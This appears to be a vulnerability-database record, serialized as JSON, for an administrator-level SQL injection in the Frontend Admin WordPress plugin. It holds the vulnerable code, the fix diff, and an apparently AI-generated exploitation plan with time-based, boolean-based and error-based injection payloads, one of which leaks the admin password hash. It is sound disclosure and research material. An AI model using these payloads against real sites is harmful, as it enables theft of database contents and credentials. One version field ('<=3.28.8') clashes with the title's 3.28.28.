[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$feCLKhwy9cKhe_is0jHw17jMNvNgABTr7XZgye1gVp1U":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-10039","frontend-admin-by-dynamiapps-authenticated-administrator-sql-injection-via-order-parameter","Frontend Admin by DynamiApps \u003C= 3.28.28 - Authenticated (Administrator+) SQL Injection via 'order' Parameter","The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to generic SQL Injection via the 'order' parameter in all versions up to, and including, 3.28.28 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Exploitation requires that the attacker also supply a valid 'orderby' parameter in the same request, as this is necessary to reach the vulnerable code path that processes and concatenates the 'order' value into the SQL query.","acf-frontend-form-element",null,"\u003C=3.28.8","3.28.29","medium",4.9,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-05-28 19:36:05","2026-05-29 07:46:49",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F51d79701-8580-4130-8f84-e739aa2f7f5f?source=api-prod",1,[22,23,24,25,26,27,28,29],"acf-frontend.php","assets\u002Fjs\u002Ffrontend-admin-min.js","assets\u002Fjs\u002Ffrontend-admin.js","main\u002Fadmin\u002Fadmin-pages\u002Fpayments\u002Flist.php","main\u002Fadmin\u002Fadmin-pages\u002Fplans\u002Flist.php","main\u002Ffrontend\u002Fforms\u002Factions\u002Fuser.php","main\u002Fplugin.php","readme.txt","researched",false,3,"# Exploitation Research Plan: CVE-2026-10039 - SQL Injection in Frontend Admin\n\n## 1. Vulnerability Summary\nThe **Frontend Admin by DynamiApps** plugin (versions \u003C= 3.28.28) is vulnerable to SQL Injection via the `order` parameter. The vulnerability exists because the plugin incorrectly uses `$wpdb->prepare()` by concatenating user-controlled input directly into the SQL template string rather than using placeholders. Specifically, in the `get_payments` and `get_plans` methods of the `WP_List_Table` classes, the `order` parameter is concatenated after `ORDER BY` logic, allowing an administrator to inject arbitrary SQL expressions.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: WordPress Admin Dashboard (`\u002Fwp-admin\u002Fadmin.php`).\n- **Target Pages**: \n    - `page=fea-payments` (renders the `FEA_Payments_List` table).\n    - `page=fea-plans` (renders the `Plans_List` table).\n- **Vulnerable Parameter**: `order`.\n- **Required Parameter**: `orderby` (must contain a valid column name to reach the vulnerable code path).\n- **Authentication**: Requires an authenticated user with `administrator` privileges (as the pages are located in the admin dashboard).\n- **Preconditions**: \n    - The plugin and its dependency **Advanced Custom Fields (ACF)** must be active.\n    - At least one record must exist in the target table (`wp_fea_payments` or `wp_fea_plans`) for the `ORDER BY` expression to be evaluated.\n\n## 3. Code Flow\n1. **Entry Point**: A user navigates to `wp-admin\u002Fadmin.php?page=fea-payments`.\n2. **Hook**: The admin page triggers the rendering of the `FEA_Payments_List` table.\n3. **Table Preparation**: The `FEA_Payments_List::prepare_items()` method is called.\n4. **Data Retrieval**: `prepare_items()` calls the static method `get_payments($per_page, $page_number)` (located in `main\u002Fadmin\u002Fadmin-pages\u002Fpayments\u002Flist.php`).\n5. **Vulnerable Sink**: Inside `get_payments()`, the SQL query is built:\n    - `orderby` is sanitized via `sanitize_sql_orderby()`.\n    - `order` is processed (lines 52-54):\n      ```php\n      $sql .= ! empty( $_REQUEST['order'] ) ? \n          $wpdb->prepare( ' ' . esc_sql( $_REQUEST['order'] ) ) \u002F\u002F \u003C--- VULNERABLE SINK\n          :\n          ' ASC';\n      ```\n6. **Execution**: The resulting `$sql` string (which now contains the payload) is executed via `$wpdb->get_results($sql, 'ARRAY_A')`.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability is located in a standard WordPress Admin list table page (`ajax => false`). \n- **Standard Admin Pages**: Do not require an AJAX nonce for initial page load and data retrieval via GET requests. \n- **Authentication**: Provided by the `wordpress_logged_in_*` session cookies.\n- **CSRF Protection**: While the page might have nonces for *actions* (like delete), the `orderby` and `order` parameters used for sorting the view are handled directly via GET\u002FPOST requests without nonce verification in the `get_payments` or `get_plans` methods.\n\n## 5. Exploitation Strategy\nWe will perform a **Time-Based Blind SQL Injection** using the `SLEEP()` function.\n\n### Payload Construction:\n- **`orderby`**: Must be a valid column name for the table. For payments: `amount`.\n- **`order`**: `, (SELECT 1 FROM (SELECT SLEEP(5))x)`\n- **Resulting SQL Fragment**: `ORDER BY amount , (SELECT 1 FROM (SELECT SLEEP(5))x) LIMIT 20 OFFSET 0`\n\n### Steps:\n1. **Login**: Authenticate as an Administrator and capture cookies.\n2. **Baseline Request**: Request the payments page with standard sorting and measure the response time.\n   ```http\n   GET \u002Fwp-admin\u002Fadmin.php?page=fea-payments&orderby=amount&order=ASC\n   ```\n3. **Exploit Request**: Request the same page with the `SLEEP` payload.\n   ```http\n   GET \u002Fwp-admin\u002Fadmin.php?page=fea-payments&orderby=amount&order=%2c%20(SELECT%201%20FROM%20(SELECT%20SLEEP(5))x)\n   ```\n4. **Verification**: If the response takes ~5 seconds longer than the baseline, the injection is successful.\n\n## 6. Test Data Setup\nThe target tables must exist and contain at least one row.\n```bash\n# Ensure ACF and Frontend Admin are active\nwp plugin activate acf-frontend-form-element advanced-custom-fields\n\n# Create the payments table (if not already created by plugin)\nwp db query \"CREATE TABLE IF NOT EXISTS wp_fea_payments (id INT AUTO_INCREMENT PRIMARY KEY, description TEXT, amount DECIMAL(10,2), currency VARCHAR(3), method VARCHAR(20), created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP);\"\n\n# Insert a dummy row to ensure the ORDER BY expression is evaluated\nwp db query \"INSERT INTO wp_fea_payments (description, amount, currency, method) VALUES ('Test Payment', 10.00, 'USD', 'stripe');\"\n```\n\n## 7. Expected Results\n- **Success**: The server response for the exploit request is delayed by 5 seconds.\n- **Data Leakage (Alternative)**: Using an error-based payload (e.g., `updatexml`) would result in a database error message containing the leaked data (if `WP_DEBUG` is enabled).\n\n## 8. Verification Steps\nAfter the exploit, verify the database state to ensure the query was executed:\n1. Review the `wpdb->last_query` if debugging is enabled.\n2. Use `wp-cli` to check for any records that might have been affected if a `BENCHMARK` or `MD5` payload was used.\n3. Check the PHP error log (if accessible) for SQL syntax errors which confirm the injection point.\n\n## 9. Alternative Approaches\nIf time-based injection is unreliable due to network latency, use **Boolean-Based Blind Injection**:\n- **True Payload**: `order=, (SELECT 1 WHERE 1=1)` (Normal response)\n- **False Payload**: `order=, (SELECT 1 WHERE 1=2)` (Possibly different response or error)\n\nAlternatively, if `WP_DEBUG` is on, use **Error-Based Injection**:\n- **Payload**: `, (SELECT 1 FROM (SELECT 1)x WHERE 1=updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users LIMIT 1),0x7e),1))`\n- **Expected**: SQL error in response containing the admin password hash.","The Frontend Admin plugin for WordPress is vulnerable to authenticated SQL Injection via the 'order' parameter in administrative list tables. This occurs due to improper use of the $wpdb->prepare() function where user-controlled input is concatenated directly into the SQL query's ORDER BY clause without sufficient validation or the use of placeholders.","\u002F* main\u002Fadmin\u002Fadmin-pages\u002Fpayments\u002Flist.php line 49 *\u002F\n\t\t\tif ( ! empty( $_REQUEST['orderby'] ) ) {\n\t\t\t\t$sql .= $wpdb->prepare( ' ORDER BY ' . sanitize_sql_orderby( $_REQUEST['orderby'] ) );\n\t\t\t\t$sql .= ! empty( $_REQUEST['order'] ) ? \n\t\t\t\t\t$wpdb->prepare( ' ' . esc_sql( $_REQUEST['order'] ) )\n\t\t\t\t\t:\n\t\t\t\t\t' ASC';\n\t\t\t}else{\n\t\t\t\t$sql .= ' ORDER BY created_at DESC' ;\n\t\t\t}\n\n---\n\n\u002F* main\u002Fadmin\u002Fadmin-pages\u002Fplans\u002Flist.php line 49 *\u002F\n\t\t\tif ( ! empty( $_REQUEST['orderby'] ) ) {\n\t\t\t\t$sql .= $wpdb->prepare( ' ORDER BY ' . sanitize_sql_orderby( $_REQUEST['orderby'] ) );\n\t\t\t\t$sql .= ! empty( $_REQUEST['order'] ) ? \n\t\t\t\t\t$wpdb->prepare( ' ' . esc_sql( $_REQUEST['order'] ) )\n\t\t\t\t\t:\n\t\t\t\t\t' ASC';\n\t\t\t}else{\n\t\t\t\t$sql .= ' ORDER BY created_at DESC' ;\n\t\t\t}","diff --git a\u002Fmain\u002Fadmin\u002Fadmin-pages\u002Fpayments\u002Flist.php b\u002Fmain\u002Fadmin\u002Fadmin-pages\u002Fpayments\u002Flist.php\n--- a\u002Fmain\u002Fadmin\u002Fadmin-pages\u002Fpayments\u002Flist.php\n+++ b\u002Fmain\u002Fadmin\u002Fadmin-pages\u002Fpayments\u002Flist.php\n@@ -50,9 +50,8 @@\n \n \t\t\tif ( ! empty( $_REQUEST['orderby'] ) ) {\n \t\t\t\t$sql .= $wpdb->prepare( ' ORDER BY ' . sanitize_sql_orderby( $_REQUEST['orderby'] ) );\n-\t\t\t\t$sql .= ! empty( $_REQUEST['order'] ) ? \n-\t\t\t\t\t$wpdb->prepare( ' ' . esc_sql( $_REQUEST['order'] ) )\n-\t\t\t\t\t:\n-\t\t\t\t\t' ASC';\n+\t\t\t\t$order = ( ! empty( $_REQUEST['order'] ) && strtolower( $_REQUEST['order'] ) === 'desc' ) ? 'DESC' : 'ASC';\n+\t\t\t\t$sql .= \" $order\";\n \t\t\t}else{\n \t\t\t\t$sql .= ' ORDER BY created_at DESC' ;\n \t\t\t}\ndiff --git a\u002Fmain\u002Fadmin\u002Fadmin-pages\u002Fplans\u002Flist.php b\u002Fmain\u002Fadmin\u002Fadmin-pages\u002Fplans\u002Flist.php\n--- a\u002Fmain\u002Fadmin\u002Fadmin-pages\u002Fplans\u002Flist.php\n+++ b\u002Fmain\u002Fadmin\u002Fadmin-pages\u002Fplans\u002Flist.php\n@@ -50,9 +50,8 @@\n \n \t\t\tif ( ! empty( $_REQUEST['orderby'] ) ) {\n \t\t\t\t$sql .= $wpdb->prepare( ' ORDER BY ' . sanitize_sql_orderby( $_REQUEST['orderby'] ) );\n-\t\t\t\t$sql .= ! empty( $_REQUEST['order'] ) ? \n-\t\t\t\t\t$wpdb->prepare( ' ' . esc_sql( $_REQUEST['order'] ) )\n-\t\t\t\t\t:\n-\t\t\t\t\t' ASC';\n+\t\t\t\t$order = ( ! empty( $_REQUEST['order'] ) && strtolower( $_REQUEST['order'] ) === 'desc' ) ? 'DESC' : 'ASC';\n+\t\t\t\t$sql .= \" $order\";\n \t\t\t}else{\n \t\t\t\t$sql .= ' ORDER BY created_at DESC' ;\n \t\t\t}","1. Authenticate as a WordPress user with 'administrator' privileges.\n2. Navigate to a page utilizing the vulnerable WP_List_Table classes, such as the payments list at '\u002Fwp-admin\u002Fadmin.php?page=fea-payments'.\n3. Craft a GET request that includes a valid 'orderby' parameter (e.g., 'amount') and a malicious 'order' parameter.\n4. Provide a time-based SQL injection payload in the 'order' parameter, such as ', (SELECT 1 FROM (SELECT SLEEP(5))x)'.\n5. The application will concatenate this payload into the SQL query's ORDER BY clause, causing the database to execute the SLEEP function and confirming the vulnerability through response time delay.","gemini-3-flash-preview","2026-06-04 15:26:08","2026-06-04 15:26:51",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","3.28.27","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Facf-frontend-form-element\u002Ftags\u002F3.28.27","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Facf-frontend-form-element.3.28.27.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Facf-frontend-form-element\u002Ftags\u002F3.28.29","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Facf-frontend-form-element.3.28.29.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Facf-frontend-form-element\u002Ftags"]